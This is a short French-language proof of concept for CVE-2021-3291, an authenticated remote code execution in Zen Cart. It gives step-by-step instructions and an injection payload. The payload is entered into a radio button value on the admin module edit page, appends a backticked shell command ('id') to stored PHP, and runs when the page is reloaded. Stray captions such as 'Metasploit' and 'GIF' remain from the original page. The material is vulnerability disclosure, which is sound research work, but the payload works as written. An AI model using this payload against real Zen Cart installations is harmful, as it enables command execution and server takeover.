
Exploit d'exécution de code à distance authentifiée pour Zen Cart via une injection SQL dans l'édition des modules d'administration. Preuve de concept pour CVE-2021-3291.
1-) connectez-vous en tant qu'admin
2-) accédez à la page d'édition de n'importe quel module
3-) inspectez l'élément de n'importe quel bouton radio true
4-) remplacez true par true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; //
5-) cliquez sur update
6-) pour déclencher la commande, retournez à la page d'édition
CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291
POC
exploitation
actualiser la page
zoom

Metasploit

GIF
